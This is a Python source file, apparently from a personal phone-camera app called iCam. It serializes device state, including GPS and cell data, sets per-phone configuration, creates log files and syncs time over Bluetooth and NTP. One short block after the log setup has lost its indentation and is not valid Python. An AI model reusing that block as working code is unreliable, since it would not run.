            localPhotoResolutionIndex
    global photoModeIndex, digitalZoom, photoQuality, exposureIndex, \
            whiteBalanceIndex, flashIndex
    global audioRecordDuration, videoRecordDuration
    global localVideoModeIndex, cameraMode, videoAudioEnabled
    global rotateDegreesImage, mobileCountryCode, mobileNetworkCode, \
            locationAreaCode, cellId, gpsInfo
    global statePackFormat, storeLocallyMedia
    global differentPixelsPercentageThreshold
    global modeManagerIsEnabled, dawnTimeVec, duskTimeVec
    global uploadHowManyOfLatestBluetoothMessages, uploadUnsentData, \
            saveUnsentPackets
    global uploadMediaToYouTube, uploadMediaToPicasa, useiCamServer
    global internetUploadMaxErrors
    global startAutomatically
    global BATTERY_LEVEL_THRESHOLD
    global reactiveLoopOpsIndex
    # sentBTMessageTo6680 is only read here, so no global statement needed.
    global MY_DEBUG_STDOUT, MY_DEBUG_STDERR, MY_DEBUG_STDERR_2, \
            MY_DEBUG_UPLOAD_MSG
    global startViewfinderBeforeTakingPhoto
    DebugPrint("Entered BuildState().")
    try:
        ReadGPSPosition()
        mediaFileSize = -1
        if (fileName is None) or (fileName == NO_MEDIA_FILE_NAME):
            fileNameStr = ""
        else:
            fileNameStr = fileName
            # Only query the size when an actual media file is given.
            try:
                mediaFileSize = os.path.getsize(pathFileName)
            except:
                DebugPrintErrorTrace()
        # The server-address field doubles as the bluetoothMode carrier;
        # LoadStateFromFile() decodes these magic strings back to a mode.
        if bluetoothMode == 0:
            tmpBluetoothServerAddress = "no_BT"
        elif bluetoothMode == 1:
            tmpBluetoothServerAddress = "BTServer"
        else:
            tmpBluetoothServerAddress = bluetoothServerAddress
        # Packet header: total payload size.
        stateMarshalled = struct.pack(statePackFormat00,
            struct.calcsize(statePackFormat))
        # IMPORTANT NOTE: b = signed char in the statePackFormat* strings.
        # !!!!uploadMediaToYouTube, uploadMediaToPicasa, useiCamServer are
        # also stored in LOCAL_CONFIG_PATH_FILENAME; they are kept here too
        # so the server can be informed of the state, but they are reloaded
        # only from the config file iCam.cfg.
        stateMarshalled += struct.pack(statePackFormat01,
            uploadMediaToYouTube, uploadMediaToPicasa, useiCamServer,
            internetUploadMaxErrors,
            BATTERY_LEVEL_THRESHOLD, # !!!!Maybe move next to battery field
            reactiveLoopOpsIndex,
            sentBTMessageTo6680, 0, 0, # !!!!Put closer to startAutomatically
            mediaFileSize, 0,
            uploadHowManyOfLatestBluetoothMessages, modeManagerIsEnabled,
            startAutomatically, saveUnsentPackets, uploadUnsentData,
            MY_DEBUG_STDOUT, MY_DEBUG_STDERR, MY_DEBUG_STDERR_2,
            MY_DEBUG_UPLOAD_MSG)
        # Our own Bluetooth address, as 6 bytes parsed from "xx:xx:...".
        btL = [int(e, 16) for e in bluetoothSelfAddress.split(":")]
        stateMarshalled += struct.pack(statePackFormat02,
            str(accessPointName),
            btL[0], btL[1], btL[2], btL[3], btL[4], btL[5],
            str(tmpBluetoothServerAddress),
            cameraId)
        stateMarshalled += struct.pack(statePackFormat03,
            crtTime.tm_year, crtTime.tm_mon, crtTime.tm_mday,
            crtTime.tm_hour, crtTime.tm_min, crtTime.tm_sec,
            numMilliseconds)
        stateMarshalled += struct.pack(statePackFormat03b, int(GetTime()), 0, 0)
        stateMarshalled += struct.pack(statePackFormat04,
            GetBatteryLevelPercentage(),
            GetFreeDriveSpace("C:"), GetFreeDriveSpace("E:"),
            GetFreeRAM(), 0, GetChargerStatus())
        stateMarshalled += struct.pack(statePackFormat05, signalUnits[:2],
            signalStrength)
        stateMarshalled += struct.pack(statePackFormat06,
            pauseIntervalGdata,
            pauseInterval, burstModeIsStarted, photoResolutionIndex, 0,
            localPhotoResolutionIndex[0], localPhotoResolutionIndex[1],
            photoModeIndex[0])
        # First 0 is for opticalZoom.
        stateMarshalled += struct.pack(statePackFormat07,
            photoModeIndex[1], digitalZoom,
            0, photoQuality, 0, exposureIndex[0], exposureIndex[1])
        stateMarshalled += struct.pack(statePackFormat08,
            whiteBalanceIndex[0], whiteBalanceIndex[1],
            flashIndex, startViewfinderBeforeTakingPhoto)
        # BUGFIX: these reserved string fields were previously written as
        # triple-quoted "comment" literals immediately followed by "";
        # Python concatenates adjacent string literals into ONE argument,
        # so fragments of the comment text (truncated/padded by struct's
        # "s" format) were packed instead of null bytes.  Passing real
        # empty strings null-pads the reserved fields, which is what
        # LoadStateFromFile() expects (it discards them).
        stateMarshalled += struct.pack(statePackFormat09,
            # Indices for: ExposureCompensation, ISO, contrast,
            # sharpness, color tone, Scene Modes.
            "",
            # Reserved (ex: ShutterSpeed).
            "",
            # Indices for localVideoMode (VideoFrameRates, VideoEncoding),
            # Video Stabilization, Audio Recording, etc.
            # (Note: the S60 Camera app on N82 has presets: TV High/Normal
            # Quality, Email High/Normal Quality, Sharing Quality.)
            "",
            # Reserved (ex: sent videoResolution).
            "")
        stateMarshalled += struct.pack(statePackFormat10,
            videoRecordDuration[0], videoRecordDuration[1],
            int(localVideoModeIndex[0]), int(localVideoModeIndex[1]),
            cameraMode[0], cameraMode[1], videoAudioEnabled, 0)
        # Reserved (ex: audioType - MP3 or AMR).
        stateMarshalled += struct.pack(statePackFormat11, "")
        # Reserved for other durations.
        stateMarshalled += struct.pack(statePackFormat12,
            audioRecordDuration, "")
        stateMarshalled += struct.pack(statePackFormat13,
            rotateDegreesImage, "")
        stateMarshalled += struct.pack(statePackFormat14,
            mobileCountryCode, mobileNetworkCode, locationAreaCode,
            cellId)
        # Reserved.
        stateMarshalled += struct.pack(statePackFormat15, "")
        # Reserved for "choose when to send Unsent", plugged in and
        # charging or not.
        stateMarshalled += struct.pack(statePackFormat16,
            storeLocallyMedia, "")
        # Reserved for noiseDetectionEnabled, faceDetection,
        # soundDetection (a human talking, a dog barking, a bird singing).
        stateMarshalled += struct.pack(statePackFormat17, motionDetectionIsOn,
            differentPixelsPercentageThreshold[0], "")
        # Same BUGFIX as statePackFormat09 above: four reserved fields.
        stateMarshalled += struct.pack(statePackFormat18,
            # Reserved for motion detection params (thresholds, etc).
            "",
            # Reserved for the result(s) returned by the simple
            # detection algorithm(s) (three fields).
            "",
            "",
            "")
        # Reserved (ex: readGPS).
        stateMarshalled += struct.pack(statePackFormat19, "")
        stateMarshalled += struct.pack(statePackFormat20,
            gpsInfo["position"]["latitude"],
            gpsInfo["position"]["longitude"],
            gpsInfo["position"]["altitude"],
            gpsInfo["position"]["vertical_accuracy"],
            gpsInfo["position"]["horizontal_accuracy"],
            gpsInfo["course"]["speed"],
            gpsInfo["course"]["heading"],
            gpsInfo["course"]["heading_accuracy"],
            gpsInfo["course"]["speed_accuracy"],
            gpsInfo["satellites"]["horizontal_dop"],
            gpsInfo["satellites"]["vertical_dop"],
            gpsInfo["satellites"]["time_dop"],
            gpsInfo["satellites"]["time"],
            gpsInfo["satellites"]["used_satellites"],
            gpsInfo["satellites"]["satellites"]
            )
        # Two 8-byte reserved fields.
        stateMarshalled += struct.pack(statePackFormat21, "", "")
        # Reserved (ex: light sensor, temperature, humidity,
        # body physiology, tap sensor, gyro, etc).
        stateMarshalled += struct.pack(statePackFormat22,
            logAccelerometerAndRotationSensors, "")
        # Thirteen 8-byte fields reserved for values of these sensors.
        stateMarshalled += struct.pack(statePackFormat23,
            "", "", "", "", "", "", "",
            "", "", "", "", "", "")
        stateMarshalled += struct.pack(statePackFormat24,
            "", # Reserved for values of these sensors.
            dawnTimeVec[0], dawnTimeVec[1], dawnTimeVec[2], 0,
            duskTimeVec[0], duskTimeVec[1], duskTimeVec[2], 0)
        stateMarshalled += struct.pack(statePackFormat25, 0)
        stateMarshalled += struct.pack(statePackFormat26, fileNameStr)
        stateMarshalled += struct.pack(statePackFormat27, ICAM_SERVER_NAME)
        # Trailing CRC32 computed over everything marshalled so far.
        crc32 = binascii.crc32(stateMarshalled)
        stateMarshalled += struct.pack(statePackFormat28, crc32)
        return stateMarshalled
    except:
        DebugPrintErrorTrace()
###############################################################################
###############################################################################
########################END STATE LOAD/STORE FUNCTIONS#########################
###############################################################################
###############################################################################
############################SETTINGS FOR MY PHONES#############################
# N95 - remarkable moment: using a defective N95 (without a working display)
# as an Internet proxy ;)
# INTERNET_PROXY_PHONE_DEVICE_ID = IMEI_N95
# N82
# This is the master in a BT network
# The master of the BT network (the phone that proxies the Internet).
INTERNET_PROXY_PHONE_DEVICE_ID = IMEI_N82
INTERNET_PROXY_PHONE_BLUETOOTH_ADDRESS = BT_ADDR_N82
# PERSONAL SPECIFIC
# Per-device overrides keyed on the IMEI read at startup; each branch
# tunes folders, Bluetooth role, debug flags, battery threshold, etc.
if deviceId == IMEI_E7:
    # MY_DEBUG_UPLOAD_MSG = False
    MY_DEBUG_UPLOAD_MSG = False
    #USE_ICAM_SERVER = False
    #USE_ICAM_SERVER = True
    #ICAM_SERVER_NAME = ICAM_GAE_SERVER_NAME
    BATTERY_LEVEL_THRESHOLD = 40
    """
    MY_DEBUG_STDOUT = False
    MY_DEBUG_STDERR = False
    MY_DEBUG_STDERR_2 = False
    MY_DEBUG_UPLOAD_MSG = False # For uploaded log messages
    """
elif deviceId == IMEI_6120:
    # Prefer the memory card (E:) for storage when present.
    LOCAL_FOLDER = "C:/iCam"
    if DoesDriveExist("E:"):
        LOCAL_FOLDER = "E:/iCam"
    uploadMediaToYouTube = 0
    uploadMediaToPicasa = 0
    useiCamServer = 2
    googleUsername = "googleUser"
    BATTERY_LEVEL_THRESHOLD = 60
    startButtonPressed = True
    saveUnsentPackets = 0 #True
    LOCAL_FOLDER_MEDIA_FILES = LOCAL_FOLDER + "/Media"
    LOCAL_FOLDER_UNSENT_FILES = LOCAL_FOLDER + "/Unsent"
    """
    LOCAL_FOLDER_AUX = "D:/iCam"
    if not os.path.exists(LOCAL_FOLDER_AUX):
        os.makedirs(LOCAL_FOLDER_AUX)
    """
    # Dead experimental toggle: the two assignments below it are
    # unconditionally overwritten right after.
    if False:
        LOCAL_FOLDER_MEDIA_FILES = LOCAL_FOLDER_TEMP + "/Media"
        ERASE_ORIGINAL_MEDIA_FILE_AFTER_READ = True
    LOCAL_FOLDER_MEDIA_FILES = LOCAL_FOLDER + "/Media"
    ERASE_ORIGINAL_MEDIA_FILE_AFTER_READ = False
    # accessPointName = u"RDSPP"
    bluetoothMode = 2 # BT client
    bluetoothServerAddress = INTERNET_PROXY_PHONE_BLUETOOTH_ADDRESS
    STATE_PATH_FILENAME = "C:/iCam/" + STATE_FILENAME
    LOCAL_CONFIG_PATH_FILENAME = "C:/iCam/" + LOCAL_CONFIG_FILENAME
    MY_DEBUG_STDOUT = False
    MY_DEBUG_STDERR = False
    MY_DEBUG_STDERR_2 = False
    MY_DEBUG_UPLOAD_MSG = False # For uploaded log messages
elif deviceId == IMEI_N95:
    LOCAL_FOLDER = "C:/iCam"
    LOCAL_CONFIG_PATH_FILENAME = LOCAL_FOLDER + "/" + LOCAL_CONFIG_FILENAME
    LOCAL_FOLDER_SENT_LOGS = LOCAL_FOLDER + "/LogsSent"
    # LOCAL_FOLDER = "E:/iCam"
    LOCAL_FOLDER_UNSENT_FILES = LOCAL_FOLDER + "/Unsent"
    startButtonPressed = True
    #saveUnsentPackets = True
    saveUnsentPackets = 0 #True
    """
    This instructs phone not to resize photos taken and send them
    at original resolution directly.
    """
    MODE_FOR_PHONE_WITH_LITTLE_RAM_AND_UNRELIABLE_MEM_CARD = True
    # To avoid resize also choose Sent res to (1280, 980)
    # LOCAL_FOLDER_AUX = "C:/iCam"
    """
    LOCAL_FOLDER_AUX = "D:/iCam"
    if not os.path.exists(LOCAL_FOLDER_AUX):
        os.makedirs(LOCAL_FOLDER_AUX)
    """
    LOCAL_FOLDER_MEDIA_FILES = LOCAL_FOLDER_TEMP + "/Media"
    ERASE_ORIGINAL_MEDIA_FILE_AFTER_READ = True
    cameraMode[0] = 1
    cameraMode[1] = 1
    videoRecordDuration[0] = 30
    videoRecordDuration[1] = 30
    """
    # MY_DEBUG_STDOUT = False
    MY_DEBUG_STDOUT = True
    MY_DEBUG_STDERR = True
    MY_DEBUG_STDERR_2 = True
    MY_DEBUG_UPLOAD_MSG = True # For uploaded log messages
    """
    MY_DEBUG_STDOUT = False
    MY_DEBUG_STDERR = False
    MY_DEBUG_STDERR_2 = False
    MY_DEBUG_UPLOAD_MSG = False # For uploaded log messages
    bluetoothMode = 0 # no BT
    # bluetoothMode = 1 #BT server
    uploadUnsentData = 2 # Send logs
elif deviceId == IMEI_6680:
    LOCAL_FOLDER = "C:/iCam"
    if DoesDriveExist("E:"):
        LOCAL_FOLDER = "E:/iCam"
    uploadMediaToYouTube = 0
    uploadMediaToPicasa = 0
    useiCamServer = 2
    googleUsername = "googleUser"
    BATTERY_LEVEL_THRESHOLD = 99
    startButtonPressed = True
    """
    This instructs phone not to resize photos taken and send them
    at original resolution directly.
    """
    MODE_FOR_PHONE_WITH_LITTLE_RAM_AND_UNRELIABLE_MEM_CARD = True
    # To avoid resize also choose Sent res to (1280, 980)
    # LOCAL_FOLDER_AUX = "C:/iCam"
    """
    LOCAL_FOLDER_AUX = "D:/iCam"
    if not os.path.exists(LOCAL_FOLDER_AUX):
        os.makedirs(LOCAL_FOLDER_AUX)
    """
    LOCAL_FOLDER_MEDIA_FILES = LOCAL_FOLDER_TEMP + "/Media"
    # LOCAL_FOLDER_UNSENT_FILES = LOCAL_FOLDER_AUX + "/Unsent"
    # LOCAL_FOLDER_UNSENT_FILES = LOCAL_FOLDER + "/Unsent"
    LOCAL_FOLDER_UNSENT_FILES = LOCAL_FOLDER + "/Unsent"
    # LOCAL_FOLDER_UNSENT_FILES = "D:/Unsent"
    ERASE_ORIGINAL_MEDIA_FILE_AFTER_READ = True
    bluetoothMode = 2 # BT client
    bluetoothServerAddress = INTERNET_PROXY_PHONE_BLUETOOTH_ADDRESS
    """
    Saving the state in C:\iCam - avoiding writing much on the mem-card,
    since 6680 sometimes corrupts mem-cards...
    """
    STATE_PATH_FILENAME = "C:/iCam/" + STATE_FILENAME
    LOCAL_CONFIG_PATH_FILENAME = "C:/iCam/" + LOCAL_CONFIG_FILENAME
    photoResolutionIndex = 10 # To allow sending the photo at Max res
    cameraMode[0] = 1
    cameraMode[1] = 1
    # videoRecordDuration[0] = 25
    # videoRecordDuration[1] = 15
    videoRecordDuration[0] = 30
    videoRecordDuration[1] = 30
    # Don't send any unsent data (maybe make it 1!!!!)
    uploadUnsentData = 0
    """
    MY_DEBUG_STDOUT = False
    MY_DEBUG_STDERR = False
    MY_DEBUG_STDERR_2 = False
    MY_DEBUG_UPLOAD_MSG = False # For uploaded log messages
    """
elif deviceId == IMEI_N82:
    LOCAL_FOLDER = "C:/iCam"
    if DoesDriveExist("E:"):
        LOCAL_FOLDER = "E:/iCam"
    uploadMediaToYouTube = 0
    uploadMediaToPicasa = 0
    useiCamServer = 2
    googleUsername = "googleUser"
    BATTERY_LEVEL_THRESHOLD = 50
    # The N82 is the Internet proxy, so it acts as the BT server.
    bluetoothMode = 1 # BT server
    uploadHowManyOfLatestBluetoothMessages = 4
    # startButtonPressed = True
    """
    LOCAL_FOLDER_AUX = "D:/iCam"
    if not os.path.exists(LOCAL_FOLDER_AUX):
        os.makedirs(LOCAL_FOLDER_AUX)
    LOCAL_FOLDER_MEDIA_FILES = LOCAL_FOLDER_AUX + "/Media"
    """
    LOCAL_FOLDER_MEDIA_FILES = LOCAL_FOLDER + "/Media"
    LOCAL_FOLDER_UNSENT_FILES = LOCAL_FOLDER + "/Unsent"
    ERASE_ORIGINAL_MEDIA_FILE_AFTER_READ = True
    STATE_PATH_FILENAME = "C:/iCam/" + STATE_FILENAME
    LOCAL_CONFIG_PATH_FILENAME = "C:/iCam/" + LOCAL_CONFIG_FILENAME
elif RASPBIAN_OS == True: #!!!!TODO: check deviceId
    bluetoothMode = 1 # BT server
    #accessPointRetryConnect = True #False
    #MY_DEBUG_STDOUT = False
    #MY_DEBUG_STDERR = False
    #MY_DEBUG_STDERR_2 = False
    MY_DEBUG_UPLOAD_MSG = False # For uploaded log messages
# Backup copy of the state file, written next to the primary one.
STATE_PATH_FILENAME_BACKUP = STATE_PATH_FILENAME + STATE_BACKUP_EXTENSION
# END PERSONAL SPECIFIC
# CreateDirectoriesAndLogFiles()
###############################################################################
###############################################################################
###############################################################################
#################################IMPORTS#######################################
###############################################################################
###############################################################################
###############################################################################
import thread
import zlib
def MyThreadStart(myFunc, funcParams=()):
    """Run myFunc on a new thread, or inline on old PyS60 runtimes.

    thread.start_new_thread silently fails on PyS60 1.4.5 - see, for
    example,
    http://www.developer.nokia.com/Community/Discussion/showthread.php?172950-Starting-a-new-thread-silently-fails-in-N97-%28PyS60-1.4.5%29
    so on Symbian builds older than PyS60 1.9 we call myFunc directly
    (ignoring funcParams, exactly as before).
    """
    mustRunInline = SYMBIAN_OS and not _PyS60_1_9_OR_NEWER
    if mustRunInline:
        myFunc()
        return
    # !!!!Use a thread pool - maybe use the one from Twisted
    thread.start_new_thread(myFunc, funcParams)
"""
I put this code here because I want to create ASAP the log files and see in
the log files any error generated by importing special modules, etc.
Unfortunately, there is no other way - see for ex.
http://stackoverflow.com/questions/1590608/is-it-possible-to-forward-declare-a-function-in-python.
# !!!!For nicer code I should put GetCurrentDateTime() and
CreateDirectoriesAndLogFiles() in a separate module and import it here.
Note: Before creating the log files, the stdout/err will output to the screen.
I tried to avoid writing on the screen, which is not nice maybe for the user:
- see LoadStateFromFile() - it has disabled the writing to stdout/err
before executing CreateDirectoriesAndLogFiles();
- TODO!!!!: MoveFileBetweenAnyDrives() (used by LoadStateFromFile())
however does NOT disable the writing to stdout/err;
- maybe? there are other functions/global pieces of code writing
before to stdout/err.
"""
def GetTime():
    """Return the current epoch time, correcting old PyS60's offset.

    Note that S60 2nd edition has GetTime() with a resolution of 1
    second (not milliseconds, as in S60 3rd ed. and the rest).

    PyS60 1.4.5 (Python 2.2 core) uses the standard timemodule.c path
    and reports the hour shifted w.r.t. ~UTC, so we add time.timezone
    ("seconds west of UTC" per the time module docs) to compensate.
    PyS60 2.0 derives the clock from User::TickCount() instead and
    needs no correction.
    !!!!TODO: test on phones with a time zone other than Bucharest;
    also test on S60 1st ed.
    """
    now = time.time()
    isOldPyS60 = SYMBIAN_S60_OS and (sys.version_info[0 : 2] == (2, 2))
    if isOldPyS60:
        return now + time.timezone
    return now
# Returns the current date/time as a time.struct_time (from time.localtime()).
def GetCurrentDateTime():
    """Return the current local time as a time.struct_time.

    Symbian goes through GetTime() to pick up its clock correction;
    every other supported platform uses time.localtime() directly.
    """
    if SYMBIAN_OS:
        return time.localtime(GetTime())
    onOtherKnownPlatform = (ANDROID_OS or iOS_PYOBJC or WINDOWS_OS
                            or UNIX_OS or WINDOWS_CE_OS_PYTHONCE
                            or RASPBIAN_OS)
    if onOtherKnownPlatform:
        return time.localtime()
    # No known platform flag set: fall through returning None,
    # exactly like the original elif chain did.
def TimeSyncForTimeResettingPhones():
    """Restore the persisted clock on phones that reset their time.

    A best-effort sync, useful only for a phone without Internet
    connectivity - AT LEAST the Nokia 6680, whose clock resets when the
    battery is removed.  If the current time is lower than the time
    recorded in state.bin (stateTime), we assume the persisted value is
    correct and push it back into the system clock.
    """
    try:
        # !!!Maybe do also if stateTime < GetTime() - 3 months, etc?
        clockWentBackwards = stateTime > GetTime()
        if clockWentBackwards and SYMBIAN_OS:
            e32.set_home_time(stateTime)
    except:
        DebugPrintErrorTrace()
# File objects and names for the redirected stdout/stderr logs;
# populated by CreateDirectoriesAndLogFiles() when the debug flags are on.
stdoutFile = None
stderrFile = None
stdoutFileName = None
stderrFileName = None
def _EnsureDirectoryExists(path):
    """Create path (with parents) if missing; best-effort.

    Failures are reported only when MY_DEBUG_STDERR is on, matching the
    original inline try/except blocks this helper replaces.
    !!!!Check also that these folders are not files with isfile()...
    """
    try:
        if not os.path.exists(path):
            os.makedirs(path)
    except:
        if MY_DEBUG_STDERR:
            traceback.print_exc()
            #sys.stderr.flush()


def CreateDirectoriesAndLogFiles():
    """Create the working folders and redirect stdout/stderr to logs.

    Ensures LOCAL_FOLDER, its Media/Unsent subfolders, and
    LOCAL_FOLDER_TEMP exist, then - depending on MY_DEBUG_STDOUT /
    MY_DEBUG_STDERR - opens timestamped std*.txt files in LOCAL_FOLDER
    (append mode) and rebinds sys.stdout / sys.stderr to them.  The
    files are intentionally left open for the lifetime of the process.
    """
    global stdoutFile, stderrFile
    global stdoutFileName, stderrFileName
    global LOCAL_FOLDER, LOCAL_FOLDER_MEDIA_FILES, LOCAL_FOLDER_UNSENT_FILES
    """
    global STATE_PATH_FILENAME
    STATE_PATH_FILENAME = LOCAL_FOLDER + "/" + STATE_FILENAME
    """
    _EnsureDirectoryExists(LOCAL_FOLDER)
    _EnsureDirectoryExists(LOCAL_FOLDER_MEDIA_FILES)
    # Note: On WinCE normally the Unsent media files are stored in .../DCIM
    _EnsureDirectoryExists(LOCAL_FOLDER_UNSENT_FILES)
    _EnsureDirectoryExists(LOCAL_FOLDER_TEMP)
    try:
        STDDateTime = time.strftime("%Y_%m_%d_%H_%M_%S", GetCurrentDateTime())
        if MY_DEBUG_STDOUT:
            # Flush whatever stdout currently points at before swapping.
            try:
                sys.stdout.flush()
            except:
                if MY_DEBUG_STDERR:
                    traceback.print_exc()
            # Nokia 6680 has little space (drive C - ~3MB) since it does
            # not have a working RS-MMC, so it can't store the long
            # stdout log files.
            # if deviceId != IMEI_6680:
            stdoutFileName = STDOUT_FILENAME_PREFIX + STDDateTime + ".txt"
            stdoutFile = open(LOCAL_FOLDER + "/" + stdoutFileName, "a")
            sys.stdout = stdoutFile
            sys.stdout.flush()
        if MY_DEBUG_STDERR:
            try:
                sys.stderr.flush()
            except:
                if MY_DEBUG_STDERR:
                    traceback.print_exc()
            stderrFileName = STDERR_FILENAME_PREFIX + STDDateTime + ".txt"
            stderrFile = open(LOCAL_FOLDER + "/" + stderrFileName, "a")
            sys.stderr = stderrFile
            sys.stderr.flush()
    except:
        DebugPrintErrorTrace()
"""
# BEFORE_MAIN:
We make here the call, because we want to have the STD files created ASAP:
- to record errors ASAP.
We call LoadStateFromFile() before CreateDirectoriesAndLogFiles() because we
want to initialize the MY_DEBUG_STDOUT/ERR variables which determine in
CreateDirectoriesAndLogFiles() that we create the std*.txt files.
"""
LoadStateFromFile(STATE_PATH_FILENAME, myDebugStdout=False, myDebugStderr=False)
CreateDirectoriesAndLogFiles()
"""
(Minor): Chose to write error to log file, if any, instead of having log file with
updated time.
"""
if deviceId == IMEI_6680:
TimeSyncForTimeResettingPhones()
if deviceId == IMEI_E7:
"""
For these to work we need to have the python files of the respective
profiler installed on the phone.
"""
try:
import profile
#import figleaf
#figleaf.start()
#import hotshot
except:
DebugPrintErrorTrace()
DebugPrint("sys.path = %s" % str(sys.path))
###############################################################################
###############################################################################
#################################TIME SYNC#####################################
###############################################################################
###############################################################################
# ntplib stays None when the import fails (too-old interpreter or module not
# installed); TimeSyncNTP() checks this and becomes a no-op in that case.
ntplib = None
try:
    if sys.version_info[0 : 2] >= (2, 5):
        """
        ntplib uses decorators, not supported in Python 2.2.
        However, I guess we can easily make it work for Python 2.2,
        if ever required.
        """
        import ntplib
except:
    DebugPrint("Not able to import the ntplib module --> ntplib = %s." % \
                str(ntplib))
    DebugPrintErrorTrace()
"""
We have 2 alternatives for the BT server to send the BT time sync:
    - BluetoothTimeSync() called in TimeSyncNTP(), which is called at the
        start of iCam. But this might be executed too often.
        BluetoothTimeSync() sends a BT message with exact time of the
        BT server which should be already correct time.
    - BluetoothTimeSyncWithDrift(btClientDeviceId, btMsgSize)
        - sends an "adjust-date-and-time-using-delta" when notices that
            the message received in BluetoothMessageProcessAndDelete()
            has a very bit time drift.
        The BT client for S60 sets in BluetoothMessageCallback(btMsgId) the
            arrival time of the BT time sync msg:
                dictBtMsgTime[btMsgId] = crtTime
            This time is used in BluetoothMessageProcessTIM(btMsgId).
"""
"""
We do NOT execute BluetoothTimeSyncWithDrift() in BluetoothMessageCallback()
because we don't want to unpack the BT SMF message to update btMsgStateTime.
"""
def BluetoothTimeSyncWithDrift(btClientDeviceId, btMsgSize, btMsgId):
    """
    This method is supposed to be executed by the BT server.
    This is for time sync performed in a BT "LAN" of devices.
    Time sync between BT server and proxies.
    We assume the BT server time is correct, e.g., taken from the iCam server.
        - this function needs to be called IMMEDIATELY as a callback when
            receiving BT message:
            - on S60 3rd we have such callback
            - on Android we can devise a separate thread that checks in the
                BT_Received folder for new files and informs iCam.

    NOTE: currently DISABLED - see the early return below; everything after
    it is dead code kept for future re-enabling.
    """
    global btMsgStateTime
    # NOTE(review): this early return deliberately disables the whole
    # function; nothing below it executes.
    return
    DebugPrint("Entered BluetoothTimeSyncWithDrift(btClientDeviceId=%s, " \
                "btMsgSize=%d, btMsgId=%s)." % \
                (btClientDeviceId, btMsgSize, str(btMsgId)))
    # We estimate (overconservatively) the time it takes to send BT message.
    deltaBT = float(btMsgSize / 20000.0) + 10
    if SYMBIAN_S60_OS:
        try:
            # Get message time of arrival.
            btMsgArrivalTime = bluetoothInbox.time(btMsgId)
            btMsgArrivalTimeStruct = time.localtime(btMsgArrivalTime)
            """
            The problem is the BT message might have been received in another
                session of iCam, was already in the Inbox, and therefore
                BluetoothMessageCallback() was not called for btMsgId, hence
                it is not present in dictBtMsgTime[btMsgId].
            Hence we update the entry with btMsgArrivalTime.
            """
            if btMsgId not in dictBtMsgTime:
                dictBtMsgTime[btMsgId] = btMsgArrivalTime
        except:
            # Sentinel values mark a failed arrival-time lookup; the debug
            # prints below tolerate them (strftime on -1 raises and is caught).
            btMsgArrivalTime = "[ERROR]"
            btMsgArrivalTimeStruct = -1
            DebugPrintErrorTrace()
    try:
        DebugPrint(
            "    BluetoothTimeSyncWithDrift(): btMsgArrivalTime = %s, " \
            "btMsgArrivalTimeStruct = %s" % \
            (str(btMsgArrivalTime), \
            time.strftime("%Y_%m_%d_%H_%M_%S", btMsgArrivalTimeStruct)))
    except:
        DebugPrintErrorTrace()
    try:
        DebugPrint("    BluetoothTimeSyncWithDrift(): dictBtMsgTime = %s" % \
                    str(dictBtMsgTime))
        """
        Was giving (at least once) exception:
            Traceback (most recent call last):
            File "a.py", line 1180, in BluetoothTimeSyncWithDrift
            KeyError: 1153689
            - see Z:\1PhD\ReVival\Logs\NokiaN82\2013_12_22_2\stderr_2013_12_22_11_47_41.txt
            The reason is the BT message might have been received in another
                session of iCam, was already in the Inbox, and therefore
                BluetoothMessageCallback() was not called for btMsgId, hence it
                is not present in dictBtMsgTime[btMsgId].
            But I updated the entry - see above:
                if btMsgId not in dictBtMsgTime:
                    ...
        """
        DebugPrint("    BluetoothTimeSyncWithDrift(): dictBtMsgTime[btMsgId] = %s" % \
                    str(dictBtMsgTime[btMsgId]))
    except:
        DebugPrintErrorTrace()
    try:
        """
        Note that btMsgStateTime has to be updated with the value from the
            SMF BT msg, from btMsgId.
        """
        DebugPrint("    BluetoothTimeSyncWithDrift(): btMsgStateTime = %s" % \
                    str(btMsgStateTime))
        # The BT server looks at time btMsgStateTime now and computes the time drift.
        #timeDrift = GetTime() - (btMsgStateTime + deltaBT)
        # The BT server looks at arrival time of BT msg and computes the time drift.
        #   dictBtMsgTime[btMsgId] = time of arrival of BT message
        #   btMsgStateTime = time reported in the state of the BT message.
        timeDrift = dictBtMsgTime[btMsgId] - (btMsgStateTime + deltaBT)
        DebugPrint("    BluetoothTimeSyncWithDrift(): deltaBT = %d, " \
                    "timeDrift = %d." % (deltaBT, timeDrift))
        # Only correct the client's clock when the drift is large.
        if abs(timeDrift) > 1800: # 30 mins
            DebugPrint("    BluetoothTimeSyncWithDrift(): Running " \
                        "ExecuteCommands().")
            ExecuteCommands(
                "send-command-via-bluetooth %s " \
                "adjust-date-and-time-using-delta %d" % \
                (btAddrTable[btClientDeviceId], timeDrift))
    except:
        DebugPrintErrorTrace()
def BluetoothTimeSync():
    """
    Send the current time to the BT clients.

    The info is relayed via the BT message NAME - the OBEX message itself is
    an empty file whose file name encodes the (slightly padded) current time.

    NOTE: the function is deliberately disabled - it returns immediately; the
    body below is kept for reference until BT time sync is re-enabled.
    (Fix vs. the original: this text used to sit AFTER the disabling return,
    so it was unreachable dead code instead of a docstring.)
    """
    return
    if SYMBIAN_OS:
        try:
            #for btClientDeviceIdVal in btAddrTable.itervalues():
            for btClientDeviceIdVal in btAddrTable:
            #for btClientDeviceIdVal in [BT_ADDR_6680, BT_ADDR_6120]:
                try:
                    #crtTime = response.tx_time
                    crtTime = GetTime() + \
                        5 # We account for transmitting the msg via BT
                    pathFileName = LOCAL_FOLDER_TEMP + "/" + \
                        BT_OBEX_FILENAME_PREFIX + \
                        "%d" % int(crtTime) + BT_OBEX_EXTENSION_TIM
                    """
                    Requires backslashes, otherwise btsocket.bt_obex_send_file
                        gives exception: error: (22, 'Invalid argument')
                    """
                    pathFileNameWithBackslashes = \
                        pathFileName.replace("/", "\\")
                    fOutput = open(pathFileNameWithBackslashes, "wb")
                    fOutput.close()
                    # NOTE(review): the file is unlinked BEFORE
                    # bt_obex_send_file() - looks wrong; confirm before
                    # re-enabling this function.
                    os.unlink(pathFileNameWithBackslashes)
                    BluetoothClientDiscoverServer(btClientDeviceIdVal)
                    btsocket.bt_obex_send_file(btAddrTable[btClientDeviceIdVal],
                        bluetoothServerOPPServicePort[btClientDeviceIdVal],
                        unicode(pathFileNameWithBackslashes))
                except:
                    DebugPrintErrorTrace()
        except:
            DebugPrintErrorTrace()
def TimeSyncNTP():
    """
    Sync the device clock from an NTP pool server.

    No-op when the ntplib module could not be imported at startup (the
    module-level ntplib is None in that case).  Obviously requires Internet
    connectivity to reach the NTP server.
    Note that TimeSyncNTP() renders useless iCamViewer\TimeSync.py .
    Never raises: a failed sync is logged and swallowed.
    """
